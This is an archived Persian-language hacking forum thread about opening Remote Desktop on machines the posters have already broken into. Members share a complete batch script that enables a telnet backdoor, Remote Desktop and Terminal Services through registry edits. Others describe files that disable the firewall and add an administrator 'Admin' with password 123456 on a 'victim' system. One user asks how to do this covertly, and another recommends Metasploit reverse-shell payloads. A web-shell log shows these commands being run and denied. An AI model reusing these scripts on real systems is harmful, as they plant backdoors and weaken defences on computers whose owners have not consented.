PDA

توجه ! این یک نسخه آرشیو شده میباشد و در این حالت شما عکسی را مشاهده نمیکنید برای مشاهده کامل متن و عکسها بر روی لینک مقابل کلیک کنید : فعال سازی ریموت دسکتاپ از طزیق cmd



AR455
05-05-2010, 06:11 PM
سلام دوستان
گاهی وفتا ما از یه سیستم shell میگیریم اما به این خاطر این که ریموت دستاپ سیستم هدف Disable هستش نمیتونیم ریموت کنیم
تو این فیلم اموزشی من شما رو با دستورات فعال سازی ریموت دسکتاپ از طریق CMD اشنا میکنم.......همچننین دستوری برای Disable کردن Firewall معرفی شده که امیدوارم مفید باشه
این سوال رو خیلی از دوستان پرسیده بودن و مشکل خوم هم بود که خوشبختانه تونستم حل کنم و راه حل رو برای شما دوستان هم قرار دادم ;;)

این فیلم در 2 پارت زیپ شده که برای استفاده باید هر 2 پارت را دانلود کنید

به خاطر گرافیک ویندوز 7 هجمش بالا رفت مجبور شدم توی 2 پارت آپ کردم
با آرزوی موفقیت

iman system
05-29-2010, 02:31 AM
..........

piscol4g
10-01-2010, 03:58 PM
اولا بابت آموزشی که قرار دادید سپاسگزارم
اما سوال اینجا که آقا میشه این این فرمانها رو در قالب یک فایل اجرایی قرار داد که با اجرای اون ریموت فعال بشه ؟
سوال دیگه اینکه در مورد ساخت یوزر جدید هم میشه این کارو انجام داد یا خیر ؟

bimokh
10-01-2010, 07:51 PM
اولا بابت آموزشی که قرار دادید سپاسگزارم
اما سوال اینجا که آقا میشه این این فرمانها رو در قالب یک فایل اجرایی قرار داد که با اجرای اون ریموت فعال بشه ؟
سوال دیگه اینکه در مورد ساخت یوزر جدید هم میشه این کارو انجام داد یا خیر ؟



:Make
@echo off
TITLE Enabeler
color 8e
cls
echo +----------------------------------------------------+
echo ¦ "Enabler" ¦
echo +----------------------------------------------------+
echo.
IF "%1"=="-t" goto telnet
IF "%1"=="-T" goto telnet
IF "%1"=="-r" goto remdesk
IF "%1"=="-R" goto remdesk
IF "%1"=="-s" goto termserv
IF "%1"=="-S" goto termserv
IF "%1"=="" goto use
goto use

:telnet
@echo off
TITLE Enabeler
color 8e
cls
@echo REGEDIT4>temp.reg
echo. >>temp.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\TlntSvr]>>temp.reg
echo. >>temp.reg
echo "ErrorControl"=dword:00000001>>temp.reg
echo "Start"=dword:00000002>>temp.reg
echo "Type"=dword:00000010>>temp.reg
echo "FailureActions"=hex& #58;00,00,00,00,00,00,00,00,00,00,00,00,03,00,00,0 0,38,65,11,00,01,00,00,00,60,e

a,00,00,01,00,00,00,60,ea,00,00,01,00,00,00,60,ea, 00,00>>temp.reg
echo. >>temp.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Mcft\TelnetServer\1.0]>>temp.reg
echo. >>temp.reg
echo "NTLM"=dword:00000001>>temp.reg
echo "TelnetPort"=dword:0000ffff>>temp.reg
echo.
regedit /s temp.reg
echo Starting Service
net start tlntsvr
echo cleanup
del /q temp.reg
goto exit

:remdesk
TITLE Enabeler
color 8e
cls
@echo off
echo Windows Registry Editor Version 5.00> c:\RD.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Terminal Server]>> c:\RD.reg
echo "fDenyTSConnections"=dword:00000000>> c:\RD.reg
echo "fAllowToGetHelp"=dword:00000000>> c:\RD.reg
regedit /s c:\RD.reg
del /q c:\RD.reg
goto exit

:termserv
TITLE Enabeler
color 8e
cls
@echo off
echo Windows Registry Editor Version 5.00> c:\TS.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\TermService]>> c:\TS.reg
echo "Start"=dword:00000002>> c:\TS.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Terminal Server]>> c:\TS.reg
echo "AllowTSConnections"=dword:00000001>> c:\TS.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Terminal Server]>> c:\TS.reg
echo "fDenyTSConnections"=dword:00000000>> c:\TS.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Terminal Server]>> c:\TS.reg
echo "fAllowToGetHelp"=dword:00000001>> c:\TS.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Mcft\Windows NT\CurrentVersion\Winlogon]>> c:\TS.reg
echo "AllowMultipleTSSessions"=dword:00000001>> c:\TS.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Mcft\Windows NT\CurrentVersion\Winlogon]>> c:\TS.reg
echo "AutoAdminLogon"="1">> c:\TS.reg
@echo --[ Registering the service... ]
echo.
REGEDIT /S C:\TS.REG
REGEDIT -S C:\TS.REG
echo [Components] >> c:\bootlog~.txt
echo TSEnabled = on >> c:\bootlog~.txt
sysocmgr /i:%windir%\inf\sysoc.inf /u:c:\bootlog~.txt /q
DEL /Q c:\TS.REG
DEL /Q c:\bootlog~.txt
echo Starting Service
net start TermServ
goto exit

:use
@echo off
TITLE Enabeler
color 8e
cls
echo +----------------------------------------------------+
echo ¦ "Enabler" ¦
echo +----------------------------------------------------+
echo.
echo User: enabler [Option]
echo.
echo Options: -t Enable [T]elnet as Backdoor on 2k (maybe XP)
echo -r Enable [R]emoteDesktop on Win XP
echo -s Enable Terminal [S]ervices on XP/2000/2003
echo.
pause

:exit

با batسیو کن رموت فعال میشه

piscol4g
10-01-2010, 08:21 PM
ممنون دوست من مشکل حل شد :66:

فقط در مورد سایر فرمانها رو هم ارائه بدید ممنون میشم
فرمان ساخت نام کاربری و ایجاد پسورد و دسترسی به سطح ادمین

فرمان غیر فعال سازی فایروال

AR455
10-01-2010, 08:50 PM
ممنون دوست من مشکل حل شد :66:

فقط در مورد سایر فرمانها رو هم ارائه بدید ممنون میشم
فرمان ساخت نام کاربری و ایجاد پسورد و دسترسی به سطح ادمین

فرمان غیر فعال سازی فایروال


برو به تاپیک مربوطه ([Only registered and activated users can see links])

piscol4g
10-01-2010, 09:00 PM
برو به تاپیک مربوطه ([Only registered and activated users can see links])

مرسی بزرگ مرد :23:

تاپیک رو پیدا کردم

HIDDEN-HUNTER
10-10-2010, 03:05 PM
با تشکر از دوست خوبم AR455

یه فایل BAT براتون قرار دادم که به ترتیب کار های زیر رو روی سیستم قربانی انجام میده!

1.Remote Desktop رو فعال میکنه.
2.FireWall رو غیر فعال میکنه.
3.یه یوزر با نام Admin و پسورد 123456 روی سیستم قربانی درست میکنه.
4.یوزر ساخته شده در مرحله قبل رو در گروه Administrators عضو میکنه.

نکته:
شما میتونید فایل رو با Notepad براز کنید و در صورت نیاز تغییراتتون رو اعمال کنید.
-------------------------------------------------------------------------------
آموزش کامل شبکه از سطح مبتدی تا پیشرفته ([Only registered and activated users can see links])

سوال و جواب های شبکه و مطالب مرتبط با شبکه ( [Only registered and activated users can see links]
)

آموزش کامل هک اکانت ADSL ([Only registered and activated users can see links])

آموزش ByPass کردن FireWall در زمان Injection ([Only registered and activated users can see links])

آموزش ByPass کردن FireWall سرور Windows با یه متود Priv8! ([Only registered and activated users can see links])

بالابردن امنیت سایت های PHP با یه ترفند ساده ([Only registered and activated users can see links])
-------------------------------------------------------------------------------

sobhan93
10-10-2010, 03:58 PM
با تشکر از دوست خوبم AR455

یه فایل BAT براتون قرار دادم که به ترتیب کار های زیر رو روی سیستم قربانی انجام میده!

1.Remote Desktop رو فعال میکنه.
2.FireWall رو غیر فعال میکنه.
3.یه یوزر با نام Admin و پسورد 123456 روی سیستم قربانی درست میکنه.
4.یوزر ساخته شده در مرحله قبل رو در گروه Administrators عضو میکنه.

نکته:
شما میتونید فایل رو با Notepad براز کنید و در صورت نیاز تغییراتتون رو اعمال کنید.
-------------------------------------------------------------------------------
آموزش کامل شبکه از سطح مبتدی تا پیشرفته ([Only registered and activated users can see links])

سوال و جواب های شبکه و مطالب مرتبط با شبکه ( [Only registered and activated users can see links]
)

آموزش کامل هک اکانت ADSL ([Only registered and activated users can see links])

آموزش ByPass کردن FireWall در زمان Injection ([Only registered and activated users can see links])

آموزش ByPass کردن FireWall سرور Windows با یه متود Priv8! ([Only registered and activated users can see links])

بالابردن امنیت سایت های PHP با یه ترفند ساده ([Only registered and activated users can see links])
-------------------------------------------------------------------------------

سلام دوستان خوبین :83: میگم اقا من اینو روی سیستم خودم بازش کردم ولی فایر والم که off نیست بعد حالا الان یه یوزر با نام Admin و پسورد 123456 روی سیستم من فعاله ؟؟ چجوری میتونم خذفش کنم ؟؟

AR455
10-11-2010, 02:29 AM
سلام دوستان خوبین :83: میگم اقا من اینو روی سیستم خودم بازش کردم ولی فایر والم که off نیست بعد حالا الان یه یوزر با نام Admin و پسورد 123456 روی سیستم من فعاله ؟؟ چجوری میتونم خذفش کنم ؟؟


اگر XP داری
net user Admin /del

اگر 7 داری اول CMD رو Run as Administrator کن و بعد همین دستور رو اجرا کن

xbox
10-24-2010, 07:47 PM
پسر کارت خيلي عالي بود مخصوصا" در مورد از کارانداختن فايروال آگه چيزهاي جديد باحال بلدي توي سايت بذار ممنون ميشم که اينکارا بکني:85:

mainy_harry2005
11-06-2010, 01:11 AM
درود
دوستان شما میتونید به جای استفاده از payload windows/shell/reverse_tcp از windows/vncinject/reverse_tcp استفاده کنید که ریموت قربانی رو بهتون میده حتا اگه غیر فعال باشه .:57:

eyar
11-21-2011, 01:01 PM
اگر xp داری
net user admin /del

اگر 7 داری اول cmd رو run as administrator کن و بعد همین دستور رو اجرا کن

با تشکر از شما این هم فایل آماده برای فعال کردن فایروال و حذف کاربر ایجاد شده

majid61
11-30-2011, 05:36 PM
سلام
یه سوال دارم
من چطور میتونم با این دستورا که گفتید واسه غیر فعال کردن فایروال و فعال کردن ریموت طرف رو سیستم اون طرف با دونستن آیپی اون این کارا بکنم
اخه این فیلم آموزشی که گذاشتید که فقط سیستم خودمونا آموزش دادید چطوری این کارا بکنیم رو سیستم طرف چطوری این کارا بکنم؟
دستوری داره یا باید حتما یه فایل واسش بفرسیتم؟
مممنون میشم کمکم کنید به صورت کد بهم بگید چیکار کنم که طرف نفهمه


کسی کمکم نمیکنه؟؟؟؟؟؟؟؟؟؟؟؟//
با چه پورت هایی میشه از سیستم طرف شل گرفت؟؟
مثلا با پورت 8080-110-135-80-3128 میشه به سیستم طرف وصل شد؟؟ اگه میشه چطوری این کارا باید بکنم

ERRJIGSAW
12-31-2011, 11:17 AM
منم همین سوال رو دارم

ir1
12-31-2011, 12:30 PM
سلام
یه سوال دارم
من چطور میتونم با این دستورا که گفتید واسه غیر فعال کردن فایروال و فعال کردن ریموت طرف رو سیستم اون طرف با دونستن آیپی اون این کارا بکنم
اخه این فیلم آموزشی که گذاشتید که فقط سیستم خودمونا آموزش دادید چطوری این کارا بکنیم رو سیستم طرف چطوری این کارا بکنم؟
دستوری داره یا باید حتما یه فایل واسش بفرسیتم؟
مممنون میشم کمکم کنید به صورت کد بهم بگید چیکار کنم که طرف نفهمه


کسی کمکم نمیکنه؟؟؟؟؟؟؟؟؟؟؟؟//
با چه پورت هایی میشه از سیستم طرف شل گرفت؟؟
مثلا با پورت 8080-110-135-80-3128 میشه به سیستم طرف وصل شد؟؟ اگه میشه چطوری این کارا باید بکنم


دوست عزیز شما اگه می خواهی با داشتن آی پی روی سیستم شخص مورد نظر ریموتش رو باز کنی باید بری اول سیستمشو هک کنی بعد که از سیستمش شل گرفتی بیای با سی ام قربانی این دستورات رو اجرا کنی اگه بخوای این کارو بکنی با دادن فایل خیلی راحت می شه کارت ولی اگه بخوا با آی پی اینرو اجرا کنی باید بری در مودش در سایت سرچ کنی چون مبحثش سنگینه نمی شه این جا اینا رو گفت در ضمن شما با آرمیتیج (متا) می تونید از سیستم طزف شل بگیرید

CM Punkkk
05-10-2012, 08:14 AM
والا اینا در مواردی که مجازی ویندوز نصب کردیم آره دقیقا راحت و آسونه

مساله اینه واسه روت شدن به ویندوز چکار باید کرد چون با این پرمیشنی که داریم اینکارا رو نمیشه انجام داد




c:\inetpub\[Only registered and activated users can see links]>cd\
cd\

c:\>echo windows registry editor version 5.00>rd.reg
echo [hkey_local_machine\system\currentcontrolset\contro l\terminal server]>>rd.r
eg
echo "firstcountmsgqpeekssleepbadapp"=dword:0000000f>>rd.reg
echo "modems with bad dsr"=hex(7)
echo "msgqbadappsleeptimeinmillisec"=dword:00000001>>rd.reg
echo "nthcountmsgqpeekssleepbadapp"=dword:00000005>>rd.reg
echo "fwritabletsccpermtab"=dword:00000000>>rd.reg
echo "deletetempdirsonexit"=dword:00000000>>rd.reg
echo "persessiontempdir"=dword:00000000>>rd.reg
echo "fdenytsconnections"=dword:00000000>>rd.reg
echo "productversion"="5.1">>rd.reg
echo "useexchangeim"=dword:00000003>>rd.reg
echo "tsadvertise"=dword:00000000>>rd.reg
echo "idlewinstationpoolcount"=dword:00000000>>rd.reg
echo windows registry editor version 5.00>rd.reg
echo "tsappcompat"=dword:00000000>>rd.reg
echo "tsenabled"=dword:00000001>>rd.reg
echo "tsuserenabled"=dword:00000000>>rd.reg
echo "fallowtogethelp"=dword:00000000>>rd.reg
regedit /s rd.reg
del rd.reg
access is denied.

c:\>echo [hkey_local_machine\system\currentcontrolset\contro l\terminal server]>>
rd.reg
access is denied.

c:\>echo "firstcountmsgqpeekssleepbadapp"=dword:0000000f>>rd.reg
access is denied.

c:\>echo "modems with bad dsr"=hex(7)
"modems with bad dsr"=hex(7)

c:\>echo "msgqbadappsleeptimeinmillisec"=dword:00000001>>rd.reg
access is denied.

c:\>echo "nthcountmsgqpeekssleepbadapp"=dword:00000005>>rd.reg
access is denied.

c:\>echo "fwritabletsccpermtab"=dword:00000000>>rd.reg
access is denied.

c:\>echo "deletetempdirsonexit"=dword:00000000>>rd.reg
access is denied.

c:\>echo "persessiontempdir"=dword:00000000>>rd.reg
access is denied.

c:\>echo "fdenytsconnections"=dword:00000000>>rd.reg
access is denied.

c:\>echo "productversion"="5.1">>rd.reg
access is denied.

c:\>echo "useexchangeim"=dword:00000003>>rd.reg
access is denied.

c:\>echo "tsadvertise"=dword:00000000>>rd.reg
access is denied.

c:\>echo "idlewinstationpoolcount"=dword:00000000>>rd.reg
access is denied.

c:\>echo "tsappcompat"=dword:00000000>>rd.reg
access is denied.

c:\>echo "tsenabled"=dword:00000001>>rd.reg
access is denied.

c:\>echo "tsuserenabled"=dword:00000000>>rd.reg
access is denied.

c:\>echo "fallowtogethelp"=dword:00000000>>rd.reg
access is denied.

c:\>regedit /s rd.reg

c:\>del rd.reg
could not find c:\rd.reg

c:\>netsh firewall set opmode disable
netsh firewall set opmode disable

important: "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see kb article 947709
at [Only registered and activated users can see links] .

the requested operation requires elevation (run as administrator).


c:\>net user admin 123456 /add & net localgroup "administrators" admin /add
net user admin 123456 /add & net localgroup "administrators" admin /add
system error 5 has occurred.

Access is denied.

System error 5 has occurred.

Access is denied.


c:\>

reza330
06-19-2013, 10:36 PM
چرا فایل ها رو نمیتونم باز کنم؟ لینکشون خرابه؟

amini08
06-20-2013, 11:13 AM
با تشکر از دوست خوبم AR455

یه فایل BAT براتون قرار دادم که به ترتیب کار های زیر رو روی سیستم قربانی انجام میده!

1.Remote Desktop رو فعال میکنه.
2.FireWall رو غیر فعال میکنه.
3.یه یوزر با نام Admin و پسورد 123456 روی سیستم قربانی درست میکنه.
4.یوزر ساخته شده در مرحله قبل رو در گروه Administrators عضو میکنه.

نکته:
شما میتونید فایل رو با Notepad براز کنید و در صورت نیاز تغییراتتون رو اعمال کنید.
-------------------------------------------------------------------------------
آموزش کامل شبکه از سطح مبتدی تا پیشرفته ([Only registered and activated users can see links])

سوال و جواب های شبکه و مطالب مرتبط با شبکه ( [Only registered and activated users can see links]
)

آموزش کامل هک اکانت ADSL ([Only registered and activated users can see links])

آموزش ByPass کردن FireWall در زمان Injection ([Only registered and activated users can see links])

آموزش ByPass کردن FireWall سرور Windows با یه متود Priv8! ([Only registered and activated users can see links])

بالابردن امنیت سایت های PHP با یه ترفند ساده ([Only registered and activated users can see links])
-------------------------------------------------------------------------------

سلام
چرا دوباره فایلها دانلود نمیشه؟؟

ardavan2
06-21-2013, 12:04 PM
عزیزان تا چند روز اینده این مشکل حل میشه لطفا اسپم ندید.